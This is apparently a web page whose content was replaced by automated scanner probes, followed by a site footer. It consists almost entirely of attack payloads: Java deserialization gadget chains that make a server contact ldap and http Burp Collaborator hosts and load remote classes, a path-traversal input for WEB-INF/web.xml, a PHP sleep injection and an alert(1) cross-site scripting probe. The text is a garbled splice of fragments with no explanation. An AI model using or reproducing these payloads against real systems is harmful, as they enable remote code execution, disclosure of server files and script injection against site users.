JldHVybmluZ0dlbmVyaWNUeXBlTlMADnBhcmFtZXRlclR5cGVzVnQAEFtqYXZhLmxhbmcuQ2xhc3NsAAAAAHpTAAhwb2ludGN1dE5TABVhc3BlY3RJbnN0YW5jZUZhY3RvcnlNdABLb3JnLnNwcmluZ2ZyYW1ld29yay5hb3AuYXNwZWN0ai5hbm5vdGF0aW9uLkJlYW5GYWN0b3J5QXNwZWN0SW5zdGFuY2VGYWN0b3J5UwAEbmFtZVMAyGxkYXA6Ly96cnU3ZnZ4NmtwenI3eDM2dWdjM2N6MWYyNjgzd3MuYnVycGNvbGxhYm9yYXRvci5uZXQvICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUwALYmVhbkZhY3RvcnlNdAA2b3JnLnNwcmluZ2ZyYW1ld29yay5qbmRpLnN1cHBvcnQuU2ltcGxlSm5kaUJlYW5GYWN0b3J5UwALcmVzb3VyY2VSZWZUUwASc2hhcmVhYmxlUmVzb3VyY2VzVnQAEWphdmEudXRpbC5IYXNoU2V0bAAAAAFTAMhsZGFwOi8venJ1N2Z2eDZrcHpyN3gzNnVnYzNjejFmMjY4M3dzLmJ1cnBjb2xsYWJvcmF0b3IubmV0LyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpTABBzaW5nbGV0b25PYmplY3RzTXQAAHpTAA1yZXNvdXJjZVR5cGVzTXQAAHpTAAZsb2dnZXJNdAAnb3JnLmFwYWNoZS5jb21tb25zLmxvZ2dpbmcuaW1wbC5Ob09wTG9nelMADGpuZGlUZW1wbGF0ZU10ACVvcmcuc3ByaW5nZnJhbWV3b3JrLmpuZGkuSm5kaVRlbXBsYXRlUwAGbG9nZ2VyTXQAJ29yZy5hcGFjaGUuY29tbW9ucy5sb2dnaW5nLmltcGwuTm9PcExvZ3pTAAtlbnZpcm9ubWVudE56elMADmFzcGVjdE1ldGFkYXRhTnpTAA1hcmd1bWVudE5hbWVzTlMAEGFyZ3VtZW50QmluZGluZ3NOelMACHBvaW50Y3V0TnpTAApjb21wYXJhdG9yTnp6UgAAAAFNdAA3b3JnLnNwcmluZ2ZyYW1ld29yay5hb3AudGFyZ2V0LkhvdFN3YXBwYWJsZVRhcmdldFNvdXJjZVMABnRhcmdldE10ADFjb20uc3VuLm9yZy5hcGFjaGUueHBhdGguaW50ZXJuYWwub2JqZWN0cy5YU3RyaW5nUwAFbV9vYmpTAATqrKMVBwlTAAhtX3BhcmVudE56elIAAAAPeg==
AAAA
../../WEB-INF/web.xml;x=
AAAA'.sleep(20).'
BBBBB
AAAA
MtMt7org.springframework.aop.target.HotSwappableTargetSourceStargetMt;org.apache.xbean.naming.context.ContextUtil$ReadOnlyBindingS isRelativeFSnameSfooS classNameNSfullNameNSisRelTSvalueMtjavax.naming.ReferenceS classNameSfooS classFactorySFreddySclassFactoryLocationS�http://bq5je7wij1y3692itsbfbb0r1i7gv5.burpcollaborator.net/ SaddrsVtjava.util.VectorlzzScontextMt/org.apache.xbean.naming.context.WritableContextScacheReferencesFSsupportReferenceableFScheckDereferenceDifferentFSassumeDereferenceBoundFSnameInNamespaceNS modifiableFSinCallNS writeLockNSbindingsRefNSindexRefNScontextFederationNS masterContextNSparsedNameInNamespaceNS contextAccessNzSboundObjRzzRMt7org.springframework.aop.target.HotSwappableTargetSourceStargetMt1com.sun.org.apache.xpath.internal.objects.XStringSm_objS旿Sm_parentNzzRz
AAAAaffmosl7hw
BBBBB
AAAA
BBBBB
AAAAalert(1)
BBBBB
AAAA0jrusy5azo
BBBBB
ss5oxgm09d
BBBBB
AAAA"
BBBBB
Can't find an answer to your question? Ask us a question